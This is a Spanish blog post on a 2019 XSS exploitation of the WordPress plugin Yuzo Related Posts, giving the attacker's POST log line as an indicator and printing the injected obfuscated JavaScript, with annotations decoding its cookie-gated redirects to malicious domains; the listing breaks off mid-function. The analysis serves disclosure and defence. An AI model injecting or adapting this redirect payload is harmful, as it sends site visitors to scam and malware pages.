Plugin yuzo-related-post de WordPress Hackeado

Actualizar Wordpress, Plugins Wordpress, Seguridad, Seguridad Wordpress

¿Tu página web en WordPress está siendo redireccionada?

Ayer se explotó de nuevo, mediante XSS, una vulnerabilidad del plugin Yuzo-Related-Post de WordPress, que está descatalogado desde el 30 de marzo de 2019.

 

 

 

El mecanismo es sencillo: dicho plugin no comprueba los privilegios o permisos de quien origina las llamadas que modifican la base de datos. De esta manera, basta un simple POST contra nuestro WordPress (en este caso desde una IP de las Seychelles) para explotar dicha puerta de entrada. En el caso que comentamos, la petición registrada fue:

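185.238.0.152 – – [XX/XX/2019:10:50:30 +0200] “POST /wp-admin/admin-post.php?page=yuzo-related-post HTTP/1.1″ 200 332 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36”

Una petición POST a /wp-admin/admin-post.php?page=yuzo-related-post como esta es el indicador que conviene buscar en los registros de acceso. Con ella se consigue que, al visitar la web, el navegador sea redirigido a páginas como: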

 

 

 

La redirección por el navegador

El código JavaScript que se inyecta a través del plugin, y que el navegador del visitante interpreta, es el siguiente:

// Cookie helpers of the injected script, kept exactly as published.
// _0xcdaa is a lookup table of hex-escaped strings; decoded in order they are:
//   "", "getTime", "setTime", "; expires=", "toUTCString", "cookie", "=",
//   "; path=/", ";", "split", "length", "substring", "charAt", " ", "indexOf",
//   "=; Max-Age=-99999999;"
// gjhwe4234(name, value, n): assigns document.cookie = name + "=" + value + expiry
//   + "; path=/". When n is truthy the expiry is now + n * 8 hours
//   (n * 8 * 60 * 60 * 1000 ms); otherwise no expiry is added.
// asdasq3hgvb(name): splits document.cookie on ";", strips leading spaces from each
//   entry and returns the text after "name=", or null when no entry matches.
// eraseCookie(name): assigns name + "=; Max-Age=-99999999;" to document.cookie.
// NOTE(review): the typographic quotes (“ ” ″) are presumably an artefact of how the
// page rendered the sample; with them the listing does not parse as JavaScript.
var _0xcdaa=[“”,”\x67\x65\x74\x54\x69\x6D\x65″,”\x73\x65\x74\x54\x69\x6D\x65″,”\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x63\x6F\x6F\x6B\x69\x65″,”\x3D”,”\x3B\x20\x70\x61\x74\x68\x3D\x2F”,”\x3B”,”\x73\x70\x6C\x69\x74″,”\x6C\x65\x6E\x67\x74\x68″,”\x73\x75\x62\x73\x74\x72\x69\x6E\x67″,”\x63\x68\x61\x72\x41\x74″,”\x20″,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x3D\x3B\x20\x4D\x61\x78\x2D\x41\x67\x65\x3D\x2D\x39\x39\x39\x39\x39\x39\x39\x39\x3B”];function gjhwe4234(_0x7f0ex2,_0x7f0ex3,_0x7f0ex4){var _0x7f0ex5=_0xcdaa[0];if(_0x7f0ex4){var _0x7f0ex6= new Date();_0x7f0ex6[_0xcdaa[2]](_0x7f0ex6[_0xcdaa[1]]()+ (_0x7f0ex4* 8* 60* 60* 1000));_0x7f0ex5= _0xcdaa[3]+ _0x7f0ex6[_0xcdaa[4]]()};document[_0xcdaa[5]]= _0x7f0ex2+ _0xcdaa[6]+ (_0x7f0ex3|| _0xcdaa[0])+ _0x7f0ex5+ _0xcdaa[7]}function asdasq3hgvb(_0x7f0ex2){var _0x7f0ex8=_0x7f0ex2+ _0xcdaa[6];var _0x7f0ex9=document[_0xcdaa[5]][_0xcdaa[9]](_0xcdaa[8]);for(var _0x7f0exa=0;_0x7f0exa< _0x7f0ex9[_0xcdaa[10]];_0x7f0exa++){var _0x7f0exb=_0x7f0ex9[_0x7f0exa];while(_0x7f0exb[_0xcdaa[12]](0)== _0xcdaa[13]){_0x7f0exb= _0x7f0exb[_0xcdaa[11]](1,_0x7f0exb[_0xcdaa[10]])};if(_0x7f0exb[_0xcdaa[14]](_0x7f0ex8)== 0){return _0x7f0exb[_0xcdaa[11]](_0x7f0ex8[_0xcdaa[10]],_0x7f0exb[_0xcdaa[10]])}};return null}function eraseCookie(_0x7f0ex2){document[_0xcdaa[5]]= _0x7f0ex2+ _0xcdaa[15]}
// Top-level dispatcher of the injected script. Three marker cookies (pp0000011,
// pp0000012, pp0000062) select which redirect a visitor receives:
//   - pp0000011 missing: set it and navigate to the URL in sdfgdfg (final else branch).
//   - pp0000011 present, pp0000012 missing: set pp0000012 and run the inline obfuscated stage.
//   - both present, pp0000062 missing: set pp0000062 and call sdhGHVA342t2g().
//   - all three present: call aASDFAAEAEHFGvF32().
// Every marker is written with gjhwe4234(name, '1', 1); per that helper's definition
// earlier in the listing, the third argument 1 yields an 8-hour expiry.
var x = asdasq3hgvb(‘pp0000011’);
var sdfgdfg = “http://choisirfemme.tk/index/?4831537102803“;
if (x) {
var x2 = asdasq3hgvb(‘pp0000012’);
if (x2) {
var x3 = asdasq3hgvb(‘pp0000062’);
if (x3) {
aASDFAAEAEHFGvF32();
}else {
gjhwe4234(‘pp0000062′,’1’,1);
sdhGHVA342t2g();
}} else {
gjhwe4234(‘pp0000012′,’1’,1);
// Inline obfuscated stage. Visible structure: a table of encrypted strings (_0x272a)
// that is rotated in place; a decoder (_0x29b5) that base64-decodes an entry (installing
// an atob fallback if none exists) and decrypts it with RC4 keyed by its second argument,
// caching the result; a second table/decoder pair (_0x34a930 / _0x1e6662) built the same
// way; and a URL assembled from decimal character codes.
// The character codes decode to (defanged):
//   hxxps://notifymepush[.]info/rs/1088?count=5&declCount=3&fullScreenMode=enabled&utm_source=clarkthread
// The last three statements pass that URL to one method and assign it to two properties.
// Only 'href' is readable; the other names are encrypted. Presumably this is the same
// document.location.replace / window.location.href / document.location.href sequence as
// the plain final branch; confirm by decoding in an isolated environment.
var _0x272a=[‘\x77\x36\x77\x47\x51\x63\x4b\x79\x77\x37\x68\x68\x77\x72\x78\x76\x77\x34\x37\x44\x69\x77\x3d\x3d’,’\x77\x35\x46\x62\x77\x35\x4c\x43\x6a\x73\x4f\x6d\x77\x6f\x77\x3d’,’\x77\x70\x2f\x44\x71\x73\x4b\x6a\x77\x37\x6a\x44\x75\x32\x67\x3d’,’\x45\x38\x4b\x44\x5a\x67\x3d\x3d’,’\x62\x73\x4b\x77\x55\x4d\x4f\x64′,’\x57\x44\x62\x43\x6d\x43\x4d\x3d’,’\x64\x4d\x4b\x59\x48\x6e\x2f\x44\x74\x53\x7a\x43\x71\x63\x4f\x2f\x46\x33\x6e\x43\x70\x73\x4b\x55′,’\x56\x4d\x4f\x50\x41\x30\x37\x44\x74\x54\x50\x43\x74\x63\x4f\x2f\x44\x6b\x7a\x44\x6c\x63\x4f\x59\x77\x37\x78\x41\x65\x6b\x63\x3d’,’\x62\x69\x42\x57\x77\x72\x7a\x44\x72\x38\x4b\x6d\x55\x73\x4f\x36\x77\x37\x62\x43\x71\x73\x4b\x50\x4b\x79\x6c\x66\x77\x71\x77\x37′,’\x4c\x73\x4b\x69\x58\x63\x4f\x51\x77\x34\x6b\x3d’,’\x77\x37\x46\x2f\x77\x71\x58\x43\x6b\x67\x3d\x3d’,’\x77\x71\x4c\x43\x67\x31\x42\x6e\x77\x35\x6a\x43\x67\x38\x4f\x7a\x58\x38\x4f\x74\x77\x72\x37\x43\x73\x68\x50\x43\x6b\x63\x4b\x4d\x77\x70\x72\x44\x6d\x6a\x48\x43\x72\x67\x6b\x3d’,’\x77\x34\x55\x69\x77\x36\x64\x6a\x54\x44\x58\x43\x6b\x45\x33\x43\x73\x6a\x76\x43\x71\x63\x4f\x64\x77\x6f\x5a\x6b\x77\x35\x4a\x79\x77\x71\x6c\x4f\x77\x37\x6a\x43\x72\x79\x62\x44\x6a\x53\x7a\x43\x6b\x6e\x2f\x44\x68\x63\x4f\x46\x77\x35\x55\x30\x77\x36\x44\x44\x6d\x43\x54\x44\x6c\x63\x4f\x48\x77\x70\x37\x43\x6c\x47\x6b\x78\x63\x63\x4b\x47\x4d\x38\x4f\x4e\x52\x52\x66\x44\x67\x38\x4b\x47\x59\x45\x74\x6c\x77\x6f\x68\x74\x59\x6e\x6b\x6d\x4c\x69\x44\x43\x6e\x4d\x4b\x50\x59\x4d\x4b\x31\x66\x4d\x4f\x2f\x55\x6a\x31\x50′,’\x77\x36\x55\x55\x77\x34\x74\x46′,’\x4f\x38\x4b\x66\x77\x34\x33\x44\x6f\x79\x42\x48\x4e\x77\x3d\x3d’,’\x77\x37\x77\x51\x55\x73\x4b\x65\x77\x6f\x6e\x44\x74\x67\x3d\x3d’,’\x77\x70\x4a\x65\x77\x71\x62\x43\x73\x63\x4f\x51\x48\x55\x54\x43\x6f\x7a\x58\x43\x74\x4d\x4f\x37\x57\x77\x3d\x3d’];(function(_0x5d4cac,_0x1ec44a){var _0x1f5dc7=function(_0x5cdf16){while(–_0x5cdf16){_0x5d4cac[‘push’](_0x5d4cac[‘shift’]());}};_0x1f5dc7(++_0x1ec44a);}(_0x272a,0x9f));var 
_0x29b5=function(_0x312681,_0x352e3d){_0x312681=_0x312681-0x0;var _0x530647=_0x272a[_0x312681];if(_0x29b5[‘eTiHtj’]===undefined){(function(){var _0x10d400;try{var _0x5a2026=Function(‘return\x20(function()\x20’+'{}.constructor(\x22return\x20this\x22)(\x20)’+’);’);_0x10d400=_0x5a2026();}catch(_0x568b7c){_0x10d400=window;}var _0x4f4c6c=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;_0x10d400[‘atob’]||(_0x10d400[‘atob’]=function(_0x3560b){var _0x786001=String(_0x3560b)[‘replace’](/=+$/,”);for(var _0x1c7a08=0x0,_0x204ed8,_0x1ed510,_0x5a6b13=0x0,_0x319b51=”;_0x1ed510=_0x786001[‘charAt’](_0x5a6b13++);~_0x1ed510&&(_0x204ed8=_0x1c7a08%0x4?_0x204ed8*0x40+_0x1ed510:_0x1ed510,_0x1c7a08++%0x4)?_0x319b51+=String[‘fromCharCode’](0xff&_0x204ed8>>(-0x2*_0x1c7a08&0x6)):0x0){_0x1ed510=_0x4f4c6c[‘indexOf’](_0x1ed510);}return _0x319b51;});}());var _0x4cb05c=function(_0x2935ab,_0x352e3d){var _0x54f285=[],_0x2ebbf7=0x0,_0x390005,_0x4cf9b4=”,_0x277afc=”;_0x2935ab=atob(_0x2935ab);for(var _0x33bcc4=0x0,_0x54fb6c=_0x2935ab[‘length’];_0x33bcc4<_0x54fb6c;_0x33bcc4++){_0x277afc+=’%’+(’00’+_0x2935ab[‘charCodeAt’](_0x33bcc4)[‘toString’](0x10))[‘slice’](-0x2);}_0x2935ab=decodeURIComponent(_0x277afc);for(var _0x448dae=0x0;_0x448dae<0x100;_0x448dae++){_0x54f285[_0x448dae]=_0x448dae;}for(_0x448dae=0x0;_0x448dae<0x100;_0x448dae++){_0x2ebbf7=(_0x2ebbf7+_0x54f285[_0x448dae]+_0x352e3d[‘charCodeAt’](_0x448dae%_0x352e3d[‘length’]))%0x100;_0x390005=_0x54f285[_0x448dae];_0x54f285[_0x448dae]=_0x54f285[_0x2ebbf7];_0x54f285[_0x2ebbf7]=_0x390005;}_0x448dae=0x0;_0x2ebbf7=0x0;for(var _0x26555d=0x0;_0x26555d<_0x2935ab[‘length’];_0x26555d++){_0x448dae=(_0x448dae+0x1)%0x100;_0x2ebbf7=(_0x2ebbf7+_0x54f285[_0x448dae])%0x100;_0x390005=_0x54f285[_0x448dae];_0x54f285[_0x448dae]=_0x54f285[_0x2ebbf7];_0x54f285[_0x2ebbf7]=_0x390005;_0x4cf9b4+=String[‘fromCharCode’](_0x2935ab[‘charCodeAt’](_0x26555d)^_0x54f285[(_0x54f285[_0x448dae]+_0x54f285[_0x2ebbf7])%0x100]);}return 
_0x4cf9b4;};_0x29b5[‘JlUMds’]=_0x4cb05c;_0x29b5[‘jlUQAn’]={};_0x29b5[‘eTiHtj’]=!![];}var _0x38bea1=_0x29b5[‘jlUQAn’][_0x312681];if(_0x38bea1===undefined){if(_0x29b5[‘XfupJP’]===undefined){_0x29b5[‘XfupJP’]=!![];}_0x530647=_0x29b5[‘JlUMds’](_0x530647,_0x352e3d);_0x29b5[‘jlUQAn’][_0x312681]=_0x530647;}else{_0x530647=_0x38bea1;}return _0x530647;};var _0xecd50d=[_0x29b5(‘0x0′,’\x70\x62\x47\x4e’),’\x77\x37\x6f\x63\x77\x6f\x73\x33\x77\x70\x6a\x43\x68\x38\x4f\x7a\x4c\x4d\x4b\x6f\x65\x42\x6e\x43\x6d\x41\x3d\x3d’,_0x29b5(‘0x1′,’\x70\x62\x47\x4e’),_0x29b5(‘0x2′,’\x35\x48\x37\x33’),_0x29b5(‘0x3′,’\x21\x69\x75\x4b’),_0x29b5(‘0x4′,’\x57\x21\x74\x46′),’\x76\x43\x56\x77\x4d\x56’,_0x29b5(‘0x5′,’\x6d\x7a\x67\x4c’),’\x7b\x7d\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29′,’\x29\x3b’,_0x29b5(‘0x6′,’\x37\x32\x41\x46’),_0x29b5(‘0x7′,’\x37\x32\x41\x46’),”,_0x29b5(‘0x8′,’\x53\x68\x29\x76’),_0x29b5(‘0x9′,’\x26\x45\x76\x31’),_0x29b5(‘0xa’,’\x78\x5e\x71\x56′),’\x69\x6e\x64\x65\x78\x4f\x66′,’\x6c\x65\x6e\x67\x74\x68′,’\x25′,’\x73\x6c\x69\x63\x65′,’\x30\x30′,’\x74\x6f\x53\x74\x72\x69\x6e\x67′,_0x29b5(‘0xb’,’\x77\x55\x42\x28′),_0x29b5(‘0xc’,’\x75\x4a\x65\x5b’),_0x29b5(‘0xd’,’\x54\x77\x29\x65′),’\x6f\x46\x57\x75\x72\x44′,’\x30\x78\x30′,’\x76\x52\x23\x70′,’\x30\x78\x31′,’\x26\x4c\x6f\x5a’,_0x29b5(‘0xe’,’\x70\x62\x47\x4e’),_0x29b5(‘0xf’,’\x21\x69\x75\x4b’),’\x30\x78\x32′,_0x29b5(‘0x10′,’\x28\x58\x67\x4c’),’\x68\x72\x65\x66′];var _0x34a930=[_0xecd50d[0x0],_0xecd50d[0x1],_0xecd50d[0x2],_0xecd50d[0x3]];(function(_0xfc2d9c,_0x42161f){var _0x3b2bba=function(_0x37f4e0){while(–_0x37f4e0){_0xfc2d9c[_0xecd50d[0x5]](_0xfc2d9c[_0xecd50d[0x4]]());}};_0x3b2bba(++_0x42161f);}(_0x34a930,0x85));var _0x1e6662=function(_0x42fa08,_0x105839){_0x42fa08=_0x42fa08-0x0;var _0x280aff=_0x34a930[_0x42fa08];if(_0x1e6662[_0xecd50d[0x6]]===undefined){(function(){var _0x5a5e25=function(){var 
_0xd80b64;try{_0xd80b64=Function(_0xecd50d[0x7]+_0xecd50d[0x8]+_0xecd50d[0x9])();}catch(_0xc78626){_0xd80b64=window;};return _0xd80b64;};var _0x1a708e=_0x5a5e25();var _0x46b9e5=_0xecd50d[0xa];_0x1a708e[_0xecd50d[0xb]]||(_0x1a708e[_0xecd50d[0xb]]=function(_0xfb962){var _0xeff5b9=String(_0xfb962)[_0xecd50d[0xd]](/=+$/,_0xecd50d[0xc]);for(var _0x5d6d18=0x0,_0x55de3b,_0x529cad,_0x10a921=0x0,_0x18904f=_0xecd50d[0xc];_0x529cad=_0xeff5b9[_0xecd50d[0xe]](_0x10a921++);~_0x529cad&&(_0x55de3b=_0x5d6d18%0x4?_0x55de3b*0x40+_0x529cad:_0x529cad,_0x5d6d18++%0x4)?_0x18904f+=String[_0xecd50d[0xf]](0xff&_0x55de3b>>(-0x2*_0x5d6d18&0x6)):0x0){_0x529cad=_0x46b9e5[_0xecd50d[0x10]](_0x529cad);};return _0x18904f;});}());var _0x2abd80=function(_0x43a885,_0x105839){var _0x33620c=[],_0x2a0bcd=0x0,_0x4201f4,_0x5851eb=_0xecd50d[0xc],_0x54bd1e=_0xecd50d[0xc];_0x43a885=atob(_0x43a885);for(var _0x343db7=0x0,_0x108973=_0x43a885[_0xecd50d[0x11]];_0x343db7<_0x108973;_0x343db7++){_0x54bd1e+=_0xecd50d[0x12]+(_0xecd50d[0x14]+_0x43a885[_0xecd50d[0x16]](_0x343db7)[_0xecd50d[0x15]](0x10))[_0xecd50d[0x13]](-0x2);};_0x43a885=decodeURIComponent(_0x54bd1e);for(var _0x1407d3=0x0;_0x1407d3<0x100;_0x1407d3++){_0x33620c[_0x1407d3]=_0x1407d3;};for(_0x1407d3=0x0;_0x1407d3<0x100;_0x1407d3++){_0x2a0bcd=(_0x2a0bcd+_0x33620c[_0x1407d3]+_0x105839[_0xecd50d[0x16]](_0x1407d3%_0x105839[_0xecd50d[0x11]]))%0x100;_0x4201f4=_0x33620c[_0x1407d3];_0x33620c[_0x1407d3]=_0x33620c[_0x2a0bcd];_0x33620c[_0x2a0bcd]=_0x4201f4;};_0x1407d3=0x0;_0x2a0bcd=0x0;for(var _0x2315dc=0x0;_0x2315dc<_0x43a885[_0xecd50d[0x11]];_0x2315dc++){_0x1407d3=(_0x1407d3+0x1)%0x100;_0x2a0bcd=(_0x2a0bcd+_0x33620c[_0x1407d3])%0x100;_0x4201f4=_0x33620c[_0x1407d3];_0x33620c[_0x1407d3]=_0x33620c[_0x2a0bcd];_0x33620c[_0x2a0bcd]=_0x4201f4;_0x5851eb+=String[_0xecd50d[0xf]](_0x43a885[_0xecd50d[0x16]](_0x2315dc)^_0x33620c[(_0x33620c[_0x1407d3]+_0x33620c[_0x2a0bcd])%0x100]);};return 
_0x5851eb;};_0x1e6662[_0xecd50d[0x17]]=_0x2abd80;_0x1e6662[_0xecd50d[0x18]]={};_0x1e6662[_0xecd50d[0x6]]=!![];};var _0x36ed49=_0x1e6662[_0xecd50d[0x18]][_0x42fa08];if(_0x36ed49===undefined){if(_0x1e6662[_0xecd50d[0x19]]===undefined){_0x1e6662[_0xecd50d[0x19]]=!![];};_0x280aff=_0x1e6662[_0xecd50d[0x17]](_0x280aff,_0x105839);_0x1e6662[_0xecd50d[0x18]][_0x42fa08]=_0x280aff;}else{_0x280aff=_0x36ed49;};return _0x280aff;};var _0x53d8e8=String[_0x1e6662(_0xecd50d[0x1a],_0xecd50d[0x1b])](104, 116, 116, 112, 115, 58, 47, 47, 110, 111, 116, 105, 102, 121, 109, 101, 112, 117, 115, 104, 46, 105, 110, 102, 111, 47, 114, 115, 47, 49, 48, 56, 56, 63, 99, 111, 117, 110, 116, 61, 53, 38, 100, 101, 99, 108, 67, 111, 117, 110, 116, 61, 51, 38, 102, 117, 108, 108, 83, 99, 114, 101, 101, 110, 77, 111, 100, 101, 61, 101, 110, 97, 98, 108, 101, 100, 38, 117, 116, 109, 95, 115, 111, 117, 114, 99, 101, 61, 99, 108, 97, 114, 107, 116, 104, 114, 101, 97, 100);document[_0x1e6662(_0xecd50d[0x1c],_0xecd50d[0x1d])][_0xecd50d[0xd]](_0x53d8e8);window[_0x1e6662(_0xecd50d[0x20],_0xecd50d[0x21])][_0x1e6662(_0xecd50d[0x1e],_0xecd50d[0x1f])]=_0x53d8e8;document[_0x1e6662(_0xecd50d[0x20],_0xecd50d[0x21])][_0xecd50d[0x22]]=_0x53d8e8;
}
} else {
// First visit (no pp0000011 cookie): mark the browser, then navigate to sdfgdfg three
// redundant ways (location.replace plus two href assignments).
gjhwe4234(‘pp0000011′,’1’,1);
document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg;}

// sdhGHVA342t2g(): redirect stage that the top-level dispatcher calls right after it
// sets the pp0000062 cookie. It takes no arguments and returns nothing.
// The body appears to be the same obfuscation stack as the dispatcher's inline stage:
// a rotated table of encrypted strings (_0x272a), a base64 + RC4 string decoder (_0x29b5)
// with an atob fallback, a second table/decoder pair (_0x34a930 / _0x1e6662), then a URL
// assembled from decimal character codes. Only the character codes differ; here they
// decode to (defanged):
//   hxxps://click[.]newsfeed[.]support/esuznxifqk
// The final three statements pass that URL to one method and assign it to two properties.
// Only 'href' is readable; the remaining names are encrypted, presumably
// location.replace and location.href. Confirm by decoding in an isolated environment.
function sdhGHVA342t2g(){
var _0x272a=[‘\x77\x36\x77\x47\x51\x63\x4b\x79\x77\x37\x68\x68\x77\x72\x78\x76\x77\x34\x37\x44\x69\x77\x3d\x3d’,’\x77\x35\x46\x62\x77\x35\x4c\x43\x6a\x73\x4f\x6d\x77\x6f\x77\x3d’,’\x77\x70\x2f\x44\x71\x73\x4b\x6a\x77\x37\x6a\x44\x75\x32\x67\x3d’,’\x45\x38\x4b\x44\x5a\x67\x3d\x3d’,’\x62\x73\x4b\x77\x55\x4d\x4f\x64′,’\x57\x44\x62\x43\x6d\x43\x4d\x3d’,’\x64\x4d\x4b\x59\x48\x6e\x2f\x44\x74\x53\x7a\x43\x71\x63\x4f\x2f\x46\x33\x6e\x43\x70\x73\x4b\x55′,’\x56\x4d\x4f\x50\x41\x30\x37\x44\x74\x54\x50\x43\x74\x63\x4f\x2f\x44\x6b\x7a\x44\x6c\x63\x4f\x59\x77\x37\x78\x41\x65\x6b\x63\x3d’,’\x62\x69\x42\x57\x77\x72\x7a\x44\x72\x38\x4b\x6d\x55\x73\x4f\x36\x77\x37\x62\x43\x71\x73\x4b\x50\x4b\x79\x6c\x66\x77\x71\x77\x37′,’\x4c\x73\x4b\x69\x58\x63\x4f\x51\x77\x34\x6b\x3d’,’\x77\x37\x46\x2f\x77\x71\x58\x43\x6b\x67\x3d\x3d’,’\x77\x71\x4c\x43\x67\x31\x42\x6e\x77\x35\x6a\x43\x67\x38\x4f\x7a\x58\x38\x4f\x74\x77\x72\x37\x43\x73\x68\x50\x43\x6b\x63\x4b\x4d\x77\x70\x72\x44\x6d\x6a\x48\x43\x72\x67\x6b\x3d’,’\x77\x34\x55\x69\x77\x36\x64\x6a\x54\x44\x58\x43\x6b\x45\x33\x43\x73\x6a\x76\x43\x71\x63\x4f\x64\x77\x6f\x5a\x6b\x77\x35\x4a\x79\x77\x71\x6c\x4f\x77\x37\x6a\x43\x72\x79\x62\x44\x6a\x53\x7a\x43\x6b\x6e\x2f\x44\x68\x63\x4f\x46\x77\x35\x55\x30\x77\x36\x44\x44\x6d\x43\x54\x44\x6c\x63\x4f\x48\x77\x70\x37\x43\x6c\x47\x6b\x78\x63\x63\x4b\x47\x4d\x38\x4f\x4e\x52\x52\x66\x44\x67\x38\x4b\x47\x59\x45\x74\x6c\x77\x6f\x68\x74\x59\x6e\x6b\x6d\x4c\x69\x44\x43\x6e\x4d\x4b\x50\x59\x4d\x4b\x31\x66\x4d\x4f\x2f\x55\x6a\x31\x50′,’\x77\x36\x55\x55\x77\x34\x74\x46′,’\x4f\x38\x4b\x66\x77\x34\x33\x44\x6f\x79\x42\x48\x4e\x77\x3d\x3d’,’\x77\x37\x77\x51\x55\x73\x4b\x65\x77\x6f\x6e\x44\x74\x67\x3d\x3d’,’\x77\x70\x4a\x65\x77\x71\x62\x43\x73\x63\x4f\x51\x48\x55\x54\x43\x6f\x7a\x58\x43\x74\x4d\x4f\x37\x57\x77\x3d\x3d’];(function(_0x5d4cac,_0x1ec44a){var _0x1f5dc7=function(_0x5cdf16){while(–_0x5cdf16){_0x5d4cac[‘push’](_0x5d4cac[‘shift’]());}};_0x1f5dc7(++_0x1ec44a);}(_0x272a,0x9f));var 
_0x29b5=function(_0x312681,_0x352e3d){_0x312681=_0x312681-0x0;var _0x530647=_0x272a[_0x312681];if(_0x29b5[‘eTiHtj’]===undefined){(function(){var _0x10d400;try{var _0x5a2026=Function(‘return\x20(function()\x20’+'{}.constructor(\x22return\x20this\x22)(\x20)’+’);’);_0x10d400=_0x5a2026();}catch(_0x568b7c){_0x10d400=window;}var _0x4f4c6c=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;_0x10d400[‘atob’]||(_0x10d400[‘atob’]=function(_0x3560b){var _0x786001=String(_0x3560b)[‘replace’](/=+$/,”);for(var _0x1c7a08=0x0,_0x204ed8,_0x1ed510,_0x5a6b13=0x0,_0x319b51=”;_0x1ed510=_0x786001[‘charAt’](_0x5a6b13++);~_0x1ed510&&(_0x204ed8=_0x1c7a08%0x4?_0x204ed8*0x40+_0x1ed510:_0x1ed510,_0x1c7a08++%0x4)?_0x319b51+=String[‘fromCharCode’](0xff&_0x204ed8>>(-0x2*_0x1c7a08&0x6)):0x0){_0x1ed510=_0x4f4c6c[‘indexOf’](_0x1ed510);}return _0x319b51;});}());var _0x4cb05c=function(_0x2935ab,_0x352e3d){var _0x54f285=[],_0x2ebbf7=0x0,_0x390005,_0x4cf9b4=”,_0x277afc=”;_0x2935ab=atob(_0x2935ab);for(var _0x33bcc4=0x0,_0x54fb6c=_0x2935ab[‘length’];_0x33bcc4<_0x54fb6c;_0x33bcc4++){_0x277afc+=’%’+(’00’+_0x2935ab[‘charCodeAt’](_0x33bcc4)[‘toString’](0x10))[‘slice’](-0x2);}_0x2935ab=decodeURIComponent(_0x277afc);for(var _0x448dae=0x0;_0x448dae<0x100;_0x448dae++){_0x54f285[_0x448dae]=_0x448dae;}for(_0x448dae=0x0;_0x448dae<0x100;_0x448dae++){_0x2ebbf7=(_0x2ebbf7+_0x54f285[_0x448dae]+_0x352e3d[‘charCodeAt’](_0x448dae%_0x352e3d[‘length’]))%0x100;_0x390005=_0x54f285[_0x448dae];_0x54f285[_0x448dae]=_0x54f285[_0x2ebbf7];_0x54f285[_0x2ebbf7]=_0x390005;}_0x448dae=0x0;_0x2ebbf7=0x0;for(var _0x26555d=0x0;_0x26555d<_0x2935ab[‘length’];_0x26555d++){_0x448dae=(_0x448dae+0x1)%0x100;_0x2ebbf7=(_0x2ebbf7+_0x54f285[_0x448dae])%0x100;_0x390005=_0x54f285[_0x448dae];_0x54f285[_0x448dae]=_0x54f285[_0x2ebbf7];_0x54f285[_0x2ebbf7]=_0x390005;_0x4cf9b4+=String[‘fromCharCode’](_0x2935ab[‘charCodeAt’](_0x26555d)^_0x54f285[(_0x54f285[_0x448dae]+_0x54f285[_0x2ebbf7])%0x100]);}return 
_0x4cf9b4;};_0x29b5[‘JlUMds’]=_0x4cb05c;_0x29b5[‘jlUQAn’]={};_0x29b5[‘eTiHtj’]=!![];}var _0x38bea1=_0x29b5[‘jlUQAn’][_0x312681];if(_0x38bea1===undefined){if(_0x29b5[‘XfupJP’]===undefined){_0x29b5[‘XfupJP’]=!![];}_0x530647=_0x29b5[‘JlUMds’](_0x530647,_0x352e3d);_0x29b5[‘jlUQAn’][_0x312681]=_0x530647;}else{_0x530647=_0x38bea1;}return _0x530647;};var _0xecd50d=[_0x29b5(‘0x0′,’\x70\x62\x47\x4e’),’\x77\x37\x6f\x63\x77\x6f\x73\x33\x77\x70\x6a\x43\x68\x38\x4f\x7a\x4c\x4d\x4b\x6f\x65\x42\x6e\x43\x6d\x41\x3d\x3d’,_0x29b5(‘0x1′,’\x70\x62\x47\x4e’),_0x29b5(‘0x2′,’\x35\x48\x37\x33’),_0x29b5(‘0x3′,’\x21\x69\x75\x4b’),_0x29b5(‘0x4′,’\x57\x21\x74\x46′),’\x76\x43\x56\x77\x4d\x56’,_0x29b5(‘0x5′,’\x6d\x7a\x67\x4c’),’\x7b\x7d\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29′,’\x29\x3b’,_0x29b5(‘0x6′,’\x37\x32\x41\x46’),_0x29b5(‘0x7′,’\x37\x32\x41\x46’),”,_0x29b5(‘0x8′,’\x53\x68\x29\x76’),_0x29b5(‘0x9′,’\x26\x45\x76\x31’),_0x29b5(‘0xa’,’\x78\x5e\x71\x56′),’\x69\x6e\x64\x65\x78\x4f\x66′,’\x6c\x65\x6e\x67\x74\x68′,’\x25′,’\x73\x6c\x69\x63\x65′,’\x30\x30′,’\x74\x6f\x53\x74\x72\x69\x6e\x67′,_0x29b5(‘0xb’,’\x77\x55\x42\x28′),_0x29b5(‘0xc’,’\x75\x4a\x65\x5b’),_0x29b5(‘0xd’,’\x54\x77\x29\x65′),’\x6f\x46\x57\x75\x72\x44′,’\x30\x78\x30′,’\x76\x52\x23\x70′,’\x30\x78\x31′,’\x26\x4c\x6f\x5a’,_0x29b5(‘0xe’,’\x70\x62\x47\x4e’),_0x29b5(‘0xf’,’\x21\x69\x75\x4b’),’\x30\x78\x32′,_0x29b5(‘0x10′,’\x28\x58\x67\x4c’),’\x68\x72\x65\x66′];var _0x34a930=[_0xecd50d[0x0],_0xecd50d[0x1],_0xecd50d[0x2],_0xecd50d[0x3]];(function(_0xfc2d9c,_0x42161f){var _0x3b2bba=function(_0x37f4e0){while(–_0x37f4e0){_0xfc2d9c[_0xecd50d[0x5]](_0xfc2d9c[_0xecd50d[0x4]]());}};_0x3b2bba(++_0x42161f);}(_0x34a930,0x85));var _0x1e6662=function(_0x42fa08,_0x105839){_0x42fa08=_0x42fa08-0x0;var _0x280aff=_0x34a930[_0x42fa08];if(_0x1e6662[_0xecd50d[0x6]]===undefined){(function(){var _0x5a5e25=function(){var 
